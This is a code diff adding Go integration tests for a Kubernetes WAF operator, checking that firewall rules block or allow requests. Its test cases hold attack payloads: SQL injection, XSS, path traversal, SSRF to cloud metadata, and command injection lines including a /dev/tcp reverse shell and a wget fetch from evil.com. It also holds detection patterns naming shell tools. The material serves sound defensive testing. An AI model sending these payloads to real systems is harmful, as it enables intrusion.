+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy initial rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", framework.SimpleBlockRule(9001, "blocked"))
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+	s.ExpectRuleSetReady(ns, "ruleset")
+
+	s.Step("create engine")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.Step("deploy backend and verify WAF works")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+	gw.ExpectBlocked("/?test=blocked")
+	gw.ExpectAllowed("/?test=safe")
+
+	s.Step("delete ruleset")
+	err := s.F.DynamicClient.Resource(framework.RuleSetGVR).Namespace(ns).Delete(
+		context.Background(), "ruleset", metav1.DeleteOptions{},
+	)
+	if err != nil {
+		t.Fatalf("failed to delete ruleset: %v", err)
+	}
+
+	s.Step("verify cached rules still apply after ruleset deletion")
+	// The WAF should continue using cached rules
+	gw.ExpectBlocked("/?test=blocked")
+	gw.ExpectAllowed("/?test=safe")
+}
+
+// TestEngineDeleteRecreate verifies that deleting and recreating an Engine
+// properly cleans up and recreates the WasmPlugin.
+func TestEngineDeleteRecreate(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("engine-recreate")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", framework.SimpleBlockRule(9101, "firstblock"))
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+
+	s.Step("create first engine")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+	s.ExpectWasmPluginExists(ns, "coraza-engine-engine")
+
+	s.Step("deploy backend")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+	gw.ExpectBlocked("/?test=firstblock")
+
+	s.Step("delete engine")
+	err := s.F.DynamicClient.Resource(framework.EngineGVR).Namespace(ns).Delete(
+		context.Background(), "engine", metav1.DeleteOptions{},
+	)
+	if err != nil {
+		t.Fatalf("failed to delete engine: %v", err)
+	}
+
+	s.Step("verify WasmPlugin is cleaned up")
+	s.ExpectResourceGone(ns, "coraza-engine-engine", framework.WasmPluginGVR)
+
+	s.Step("update rules for second engine")
+	s.UpdateConfigMap(ns, "block-rules", framework.SimpleBlockRule(9102, "secondblock"))
+
+	s.Step("recreate engine")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+	s.ExpectWasmPluginExists(ns, "coraza-engine-engine")
+
+	s.Step("verify new rules are applied")
+	gw.ExpectBlocked("/?test=secondblock")
+	gw.ExpectAllowed("/?test=firstblock") // Old rule should no longer block
+}
+
+// TestConfigMapDeletion verifies that deleting a ConfigMap referenced by a RuleSet
+// causes the RuleSet to become degraded, but cached rules continue to apply.
+func TestConfigMapDeletion(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("cm-delete")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+	s.CreateConfigMap(ns, "block-rules", framework.SimpleBlockRule(9201, "blocked"))
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "block-rules"})
+	s.ExpectRuleSetReady(ns, "ruleset")
+
+	s.Step("create engine")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.Step("deploy backend and verify WAF works")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+	gw.ExpectBlocked("/?test=blocked")
+
+	s.Step("delete ConfigMap")
+	err := s.F.KubeClient.CoreV1().ConfigMaps(ns).Delete(
+		context.Background(), "block-rules", metav1.DeleteOptions{},
+	)
+	if err != nil {
+		t.Fatalf("failed to delete configmap: %v", err)
+	}
+
+	s.Step("verify cached rules still apply")
+	// Cached rules should continue working
+	gw.ExpectBlocked("/?test=blocked")
+	gw.ExpectAllowed("/?test=safe")
+}
+
+// TestRuleSetOrderMatters verifies that ConfigMaps in a RuleSet are processed
+// in order, and rule precedence is maintained.
+func TestRuleSetOrderMatters(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("rule-order")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules with specific order")
+	// First rule: allow everything with "safe" prefix
+	s.CreateConfigMap(ns, "allow-rules", `SecRuleEngine On
+SecRule REQUEST_URI "@beginsWith /safe" "id:9301,phase:1,pass,nolog"`)
+
+	// Second rule: block everything with "blocked" (should apply after allow)
+	s.CreateConfigMap(ns, "block-rules", `SecRule REQUEST_URI|ARGS "@contains blocked" "id:9302,phase:2,deny,status:403"`)
+
+	// Third rule: specific override - block even safe paths with "override"
+	s.CreateConfigMap(ns, "override-rules", `SecRule REQUEST_URI "@contains override" "id:9303,phase:1,deny,status:403"`)
+
+	s.CreateRuleSet(ns, "ruleset", []string{"allow-rules", "block-rules", "override-rules"})
+
+	s.Step("create engine")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.Step("deploy backend")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	s.Step("verify rule order is respected")
+	gw.ExpectAllowed("/safe/path")
+	gw.ExpectBlocked("/?test=blocked")
+	gw.ExpectBlocked("/safe/override") // Override rule should block even safe paths
+}
+
+// TestEmptyRuleSet verifies that a RuleSet with SecRuleEngine Off
+// allows all traffic to pass through.
+func TestEmptyRuleSet(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("empty-ruleset")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules with engine disabled")
+	s.CreateConfigMap(ns, "disabled-rules", `SecRuleEngine Off`)
+	s.CreateRuleSet(ns, "ruleset", []string{"disabled-rules"})
+
+	s.Step("create engine")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.Step("deploy backend")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	s.Step("verify all traffic passes through")
+	gw.ExpectAllowed("/")
+	gw.ExpectAllowed("/?attack=" + url.QueryEscape("<script>alert(1)</script>"))
+	gw.ExpectAllowed("/?sql=" + url.QueryEscape("DROP TABLE users"))
+	gw.ExpectAllowed("/admin/../../../etc/passwd")
+}

--- a/test/integration/security_patterns_test.go
+++ b/test/integration/security_patterns_test.go
@@ -1,0 +1,396 @@
+//go:build integration
+
+/*
+Copyright Coraza Kubernetes Operator contributors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package integration
+
+import (
+	"net/http"
+	"net/url"
+	"testing"
+
+	"github.com/networking-incubator/coraza-kubernetes-operator/test/framework"
+)
+
+// TestSQLInjectionPatterns tests various SQL injection attack patterns
+// to verify WAF detection capabilities.
+func TestSQLInjectionPatterns(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("sqli-patterns")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy SQL injection detection rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On
+SecDebugLogLevel 9
+SecDebugLog /dev/stdout
+SecRequestBodyAccess On`)
+
+	// Comprehensive SQLi detection rules
+	s.CreateConfigMap(ns, "sqli-rules", `
+# Union-based SQLi
+SecRule ARGS "@rx (?i:union\s+(all\s+)?select)" "id:13001,phase:2,deny,status:403,msg:'Union-based SQLi',log,auditlog"
+
+# Classic SQLi patterns
+SecRule ARGS "@rx (?i:'\s*(or|and)\s*('|\"|\d|true|false))" "id:13002,phase:2,deny,status:403,msg:'Classic SQLi',log,auditlog"
+
+# Stacked queries
+SecRule ARGS "@rx ;\s*(?i:select|insert|update|delete|drop|create|alter)" "id:13003,phase:2,deny,status:403,msg:'Stacked query SQLi',log,auditlog"
+
+# Comment-based bypass
+SecRule ARGS "@rx (?i:/\*.*\*/|--\s*$|#\s*$)" "id:13004,phase:2,deny,status:403,msg:'Comment-based SQLi',log,auditlog"
+
+# Encoded SQLi
+SecRule ARGS "@rx (?i:%27|%22|%3B|%2D%2D)" "id:13005,phase:2,deny,status:403,msg:'Encoded SQLi',log,auditlog"
+
+# Time-based blind SQLi
+SecRule ARGS "@rx (?i:(sleep|benchmark|waitfor)\s*\()" "id:13006,phase:2,deny,status:403,msg:'Time-based SQLi',log,auditlog"
+`)
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "sqli-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	testCases := []struct {
+		name    string
+		payload string
+	}{
+		{"union_select", "1 UNION SELECT * FROM users"},
+		{"union_all_select", "1 UNION ALL SELECT password FROM admin"},
+		{"or_true", "' OR '1'='1"},
+		{"or_numeric", "' OR 1=1--"},
+		{"and_false", "' AND '1'='2"},
+		{"stacked_select", "1; SELECT * FROM users"},
+		{"stacked_drop", "1; DROP TABLE users"},
+		{"comment_dash", "admin'--"},
+		{"comment_hash", "admin'#"},
+		{"comment_block", "admin'/**/"},
+		{"sleep_function", "1' AND SLEEP(5)--"},
+		{"benchmark", "1' AND BENCHMARK(1000000,SHA1('test'))--"},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.name, func(t *testing.T) {
+			path := "/?input=" + url.QueryEscape(tc.payload)
+			gw.ExpectStatus(path, http.StatusForbidden)
+		})
+	}
+
+	s.Step("verify safe queries pass")
+	gw.ExpectAllowed("/?search=hello+world")
+	gw.ExpectAllowed("/?id=12345")
+	gw.ExpectAllowed("/?name=John+Doe")
+}
+
+// TestXSSPatterns tests various XSS attack patterns
+// to verify WAF detection capabilities.
+func TestXSSPatterns(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("xss-patterns")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy XSS detection rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On
+SecDebugLogLevel 9
+SecDebugLog /dev/stdout
+SecRequestBodyAccess On`)
+
+	s.CreateConfigMap(ns, "xss-rules", `
+# Script tags
+SecRule ARGS "@rx (?i:<script[^>]*>)" "id:13101,phase:2,deny,status:403,msg:'Script tag XSS',log,auditlog"
+
+# Event handlers
+SecRule ARGS "@rx (?i:on(load|error|click|mouseover|mouseout|mousedown|mouseup|focus|blur|change|submit|keydown|keyup|keypress)\s*=)" "id:13102,phase:2,deny,status:403,msg:'Event handler XSS',log,auditlog"
+
+# JavaScript protocol
+SecRule ARGS "@rx (?i:javascript\s*:)" "id:13103,phase:2,deny,status:403,msg:'JavaScript protocol XSS',log,auditlog"
+
+# Data URI with script
+SecRule ARGS "@rx (?i:data\s*:.*script)" "id:13104,phase:2,deny,status:403,msg:'Data URI XSS',log,auditlog"
+
+# SVG with script
+SecRule ARGS "@rx (?i:<svg[^>]*onload)" "id:13105,phase:2,deny,status:403,msg:'SVG XSS',log,auditlog"
+
+# IMG tag with onerror
+SecRule ARGS "@rx (?i:<img[^>]*onerror)" "id:13106,phase:2,deny,status:403,msg:'IMG onerror XSS',log,auditlog"
+
+# Iframe injection
+SecRule ARGS "@rx (?i:<iframe[^>]*>)" "id:13107,phase:2,deny,status:403,msg:'Iframe XSS',log,auditlog"
+`)
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "xss-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	testCases := []struct {
+		name    string
+		payload string
+	}{
+		{"script_tag", "<script>alert(1)</script>"},
+		{"script_src", "<script src='evil.js'></script>"},
+		{"onload", "<body onload='alert(1)'>"},
+		{"onerror", "<img src=x onerror='alert(1)'>"},
+		{"onclick", "<div onclick='alert(1)'>click</div>"},
+		{"onmouseover", "<a onmouseover='alert(1)'>hover</a>"},
+		{"javascript_href", "<a href='javascript:alert(1)'>link</a>"},
+		{"svg_onload", "<svg onload='alert(1)'>"},
+		{"iframe", "<iframe src='http://evil.com'></iframe>"},
+		{"data_uri", "data:text/html,<script>alert(1)</script>"},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.name, func(t *testing.T) {
+			path := "/?input=" + url.QueryEscape(tc.payload)
+			gw.ExpectStatus(path, http.StatusForbidden)
+		})
+	}
+
+	s.Step("verify safe HTML passes")
+	gw.ExpectAllowed("/?content=Hello+World")
+	gw.ExpectAllowed("/?html=<p>Paragraph</p>") // Simple HTML without scripts
+}
+
+// TestPathTraversal tests path traversal attack patterns.
+func TestPathTraversal(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("path-traversal")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy path traversal detection rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On
+SecDebugLogLevel 9
+SecDebugLog /dev/stdout`)
+
+	s.CreateConfigMap(ns, "traversal-rules", `
+# Basic path traversal
+SecRule REQUEST_URI|ARGS "@rx \.\.(\/|\\\\|%5[cC])" "id:13201,phase:1,deny,status:403,msg:'Path traversal',log,auditlog"
+
+# Encoded path traversal
+SecRule REQUEST_URI|ARGS "@rx (%2e%2e%2f|%2e%2e/|\.\.%2f|%2e%2e%5c)" "id:13202,phase:1,deny,status:403,msg:'Encoded path traversal',log,auditlog"
+
+# Null byte injection
+SecRule REQUEST_URI|ARGS "@rx %00" "id:13203,phase:1,deny,status:403,msg:'Null byte injection',log,auditlog"
+
+# Sensitive file access
+SecRule REQUEST_URI "@rx (?i:(etc/passwd|etc/shadow|\.htaccess|web\.config|wp-config))" "id:13204,phase:1,deny,status:403,msg:'Sensitive file access',log,auditlog"
+`)
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "traversal-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	testCases := []struct {
+		name string
+		path string
+	}{
+		{"basic_traversal", "/?file=../../../etc/passwd"},
+		{"double_traversal", "/?file=....//....//etc/passwd"},
+		{"absolute_path", "/?file=/etc/passwd"},
+		{"windows_traversal", "/?file=..%5C..%5Cwindows%5Csystem32"},
+		{"htaccess", "/.htaccess"},
+		{"wp_config", "/wp-config.php"},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.name, func(t *testing.T) {
+			gw.ExpectStatus(tc.path, http.StatusForbidden)
+		})
+	}
+
+	s.Step("verify safe paths pass")
+	gw.ExpectAllowed("/api/users")
+	gw.ExpectAllowed("/static/images/logo.png")
+	gw.ExpectAllowed("/?file=document.pdf")
+}
+
+// TestCommandInjection tests command injection attack patterns.
+func TestCommandInjection(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("cmd-injection")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy command injection detection rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On
+SecDebugLogLevel 9
+SecDebugLog /dev/stdout
+SecRequestBodyAccess On`)
+
+	s.CreateConfigMap(ns, "cmdi-rules", `
+# Command separators
+SecRule ARGS "@rx [;|&`+"`"+`$]" "id:13301,phase:2,deny,status:403,msg:'Command separator',log,auditlog"
+
+# Command substitution
+SecRule ARGS "@rx \$\([^)]+\)" "id:13302,phase:2,deny,status:403,msg:'Command substitution',log,auditlog"
+
+# Common commands
+SecRule ARGS "@rx (?i:(cat|ls|id|whoami|uname|pwd|wget|curl|nc|netcat)\s)" "id:13303,phase:2,deny,status:403,msg:'Common command',log,auditlog"
+
+# Reverse shell patterns
+SecRule ARGS "@rx (?i:(/bin/(ba)?sh|/dev/tcp|mkfifo))" "id:13304,phase:2,deny,status:403,msg:'Reverse shell',log,auditlog"
+`)
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "cmdi-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	testCases := []struct {
+		name    string
+		payload string
+	}{
+		{"semicolon", "test; cat /etc/passwd"},
+		{"pipe", "test | id"},
+		{"ampersand", "test && whoami"},
+		{"backtick", "test `id`"},
+		{"dollar_paren", "test $(whoami)"},
+		{"cat_command", "cat /etc/passwd"},
+		{"wget", "wget http://evil.com/shell.sh"},
+		{"curl", "curl http://evil.com/shell.sh"},
+		{"reverse_shell", "/bin/bash -i >& /dev/tcp/evil.com/4444 0>&1"},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.name, func(t *testing.T) {
+			path := "/?cmd=" + url.QueryEscape(tc.payload)
+			gw.ExpectStatus(path, http.StatusForbidden)
+		})
+	}
+
+	s.Step("verify safe inputs pass")
+	gw.ExpectAllowed("/?input=hello")
+	gw.ExpectAllowed("/?name=John")
+}
+
+// TestProtocolAttacks tests various protocol-level attacks.
+func TestProtocolAttacks(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("protocol-attacks")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy protocol attack detection rules")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On
+SecDebugLogLevel 9
+SecDebugLog /dev/stdout`)
+
+	s.CreateConfigMap(ns, "protocol-rules", `
+# HTTP response splitting
+SecRule ARGS "@rx (%0d%0a|%0d|%0a|\r\n|\r|\n)" "id:13401,phase:2,deny,status:403,msg:'HTTP response splitting',log,auditlog"
+
+# LDAP injection
+SecRule ARGS "@rx (?i:\)|\(|\*|\\\\)" "id:13402,phase:2,deny,status:403,msg:'LDAP injection',log,auditlog"
+
+# XML injection
+SecRule ARGS "@rx (?i:<!ENTITY|<!DOCTYPE|<!\[CDATA\[)" "id:13403,phase:2,deny,status:403,msg:'XML injection',log,auditlog"
+
+# SSRF patterns
+SecRule ARGS "@rx (?i:(127\.0\.0\.1|localhost|0\.0\.0\.0|169\.254\.))" "id:13404,phase:2,deny,status:403,msg:'SSRF attempt',log,auditlog"
+
+# File inclusion
+SecRule ARGS "@rx (?i:(file://|php://|expect://|data://text))" "id:13405,phase:2,deny,status:403,msg:'File inclusion',log,auditlog"
+`)
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "protocol-rules"})
+
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	testCases := []struct {
+		name    string
+		payload string
+	}{
+		{"crlf_injection", "test%0d%0aSet-Cookie: evil=value"},
+		{"ldap_wildcard", "(uid=*)"},
+		{"xml_entity", "<!ENTITY xxe SYSTEM 'file:///etc/passwd'>"},
+		{"ssrf_localhost", "http://127.0.0.1/admin"},
+		{"ssrf_metadata", "http://169.254.169.254/latest/meta-data/"},
+		{"file_protocol", "file:///etc/passwd"},
+		{"php_filter", "php://filter/convert.base64-encode/resource=index.php"},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.name, func(t *testing.T) {
+			path := "/?url=" + url.QueryEscape(tc.payload)
+			gw.ExpectStatus(path, http.StatusForbidden)
+		})
+	}
+
+	s.Step("verify safe URLs pass")
+	gw.ExpectAllowed("/?url=https://example.com/page")
+	gw.ExpectAllowed("/?callback=myFunction")
+}

--- a/test/integration/waf_enforcement_test.go
+++ b/test/integration/waf_enforcement_test.go
@@ -1,0 +1,237 @@
+//go:build integration
+
+/*
+Copyright Coraza Kubernetes Operator contributors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package integration
+
+import (
+	"fmt"
+	"net/http"
+	"testing"
+
+	wafv1alpha1 "github.com/networking-incubator/coraza-kubernetes-operator/api/v1alpha1"
+	"github.com/networking-incubator/coraza-kubernetes-operator/test/framework"
+)
+
+// TestBlockByStatusCode verifies that different HTTP status codes (403, 406, 503)
+// can be configured for blocked requests via SecLang rules.
+func TestBlockByStatusCode(t *testing.T) {
+	t.Parallel()
+
+	testCases := []struct {
+		name       string
+		statusCode int
+		ruleID     int
+		target     string
+	}{
+		{"status_403", http.StatusForbidden, 5001, "block403"},
+		{"status_406", http.StatusNotAcceptable, 5002, "block406"},
+		{"status_503", http.StatusServiceUnavailable, 5003, "block503"},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.name, func(t *testing.T) {
+			t.Parallel()
+			s := fw.NewScenario(t)
+
+			ns := s.GenerateNamespace("status-code")
+
+			s.Step("create gateway")
+			s.CreateGateway(ns, "gw")
+			s.ExpectGatewayProgrammed(ns, "gw")
+
+			s.Step("deploy rules with custom status code")
+			s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On`)
+			s.CreateConfigMap(ns, "status-rules", fmt.Sprintf(
+				`SecRule ARGS|REQUEST_URI "@contains %s" "id:%d,phase:2,deny,status:%d,msg:'Custom status'"`,
+				tc.target, tc.ruleID, tc.statusCode,
+			))
+			s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "status-rules"})
+
+			s.Step("create engine")
+			s.CreateEngine(ns, "engine", framework.EngineOpts{
+				RuleSetName: "ruleset",
+				GatewayName: "gw",
+			})
+			s.ExpectEngineReady(ns, "engine")
+
+			s.Step("deploy backend and route")
+			s.CreateEchoBackend(ns, "echo")
+			s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+			s.Step("verify custom status code")
+			gw := s.ProxyToGateway(ns, "gw")
+			gw.ExpectStatus(fmt.Sprintf("/?test=%s", tc.target), tc.statusCode)
+
+			s.Step("verify clean traffic allowed")
+			gw.ExpectAllowed("/?test=safe")
+		})
+	}
+}
+
+// TestAllowPolicyOnFailure tests that failurePolicy: allow lets traffic through
+// when the WAF encounters issues (e.g., missing RuleSet).
+func TestAllowPolicyOnFailure(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("allow-policy")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("create engine with allow policy referencing non-existent ruleset")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName:   "nonexistent-ruleset",
+		GatewayName:   "gw",
+		FailurePolicy: wafv1alpha1.FailurePolicyAllow,
+	})
+
+	s.Step("deploy backend and route")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	s.Step("verify traffic is allowed despite missing ruleset")
+	gw := s.ProxyToGateway(ns, "gw")
+	gw.ExpectAllowed("/")
+	gw.ExpectAllowed("/?potentially=malicious")
+}
+
+// TestRequestBodyInspection verifies that POST/PUT body content triggers
+// WAF rules (SQL injection, XSS patterns in body).
+func TestRequestBodyInspection(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("body-inspection")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules for body inspection")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On
+SecDebugLogLevel 9
+SecDebugLog /dev/stdout
+SecRequestBodyAccess On
+SecRequestBodyLimit 13107200
+SecRequestBodyNoFilesLimit 131072`)
+	s.CreateConfigMap(ns, "body-rules", `
+SecRule REQUEST_BODY "@contains DROP TABLE" "id:6001,phase:2,pass,msg:'SQL injection in body',log,auditlog"
+SecRule REQUEST_BODY "@contains <script>" "id:6002,phase:2,pass,msg:'XSS in body',log,auditlog"
+SecRule REQUEST_BODY "@contains malicious_payload" "id:6003,phase:2,pass,msg:'Malicious payload',log,auditlog"
+`)
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "body-rules"})
+
+	s.Step("create engine")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
+	s.ExpectEngineReady(ns, "engine")
+
+	s.Step("deploy backend and route")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	s.Step("verify SQL injection in body is logged")
+	gw.ExpectPostAllowed("/api/data", "application/json", `{"query": "DROP TABLE users"}`)
+
+	s.Step("verify XSS in body is logged")
+	gw.ExpectPostAllowed("/api/comment", "text/plain", `<script>alert('xss')</script>`)
+
+	s.Step("verify malicious payload in form data is logged")
+	gw.ExpectPostAllowed("/api/submit", "application/x-www-form-urlencoded", "data=malicious_payload")
+
+	s.Step("verify clean POST body is allowed")
+	gw.ExpectPostAllowed("/api/data", "application/json", `{"name": "safe data"}`)
+}
+
+// TestRequestHeaderInspection verifies that malicious headers
+// (User-Agent, Cookie, custom headers) get blocked by WAF rules.
+func TestRequestHeaderInspection(t *testing.T) {
+	t.Parallel()
+	s := fw.NewScenario(t)
+
+	ns := s.GenerateNamespace("header-inspection")
+
+	s.Step("create gateway")
+	s.CreateGateway(ns, "gw")
+	s.ExpectGatewayProgrammed(ns, "gw")
+
+	s.Step("deploy rules for header inspection")
+	s.CreateConfigMap(ns, "base-rules", `SecRuleEngine On
+SecDebugLogLevel 9
+SecDebugLog /dev/stdout`)
+	s.CreateConfigMap(ns, "header-rules", `
+SecRule REQUEST_HEADERS:User-Agent "@contains sqlmap" "id:7001,phase:1,deny,status:403,msg:'SQLMap detected',log,auditlog"
+SecRule REQUEST_HEADERS:User-Agent "@contains nikto" "id:7002,phase:1,deny,status:403,msg:'Nikto scanner detected',log,auditlog"
+SecRule REQUEST_HEADERS:Cookie "@contains <script>" "id:7003,phase:1,deny,status:403,msg:'XSS in cookie',log,auditlog"
+SecRule REQUEST_HEADERS:X-Custom-Header "@contains attack" "id:7004,phase:1,deny,status:403,msg:'Attack in custom header',log,auditlog"
+SecRule REQUEST_HEADERS:Referer "@contains evil.com" "id:7005,phase:1,deny,status:403,msg:'Evil referer',log,auditlog"
+`)
+	s.CreateRuleSet(ns, "ruleset", []string{"base-rules", "header-rules"})
+
+	s.Step("create engine")
+	s.CreateEngine(ns, "engine", framework.EngineOpts{
+		RuleSetName: "ruleset",
+		GatewayName: "gw",
+	})
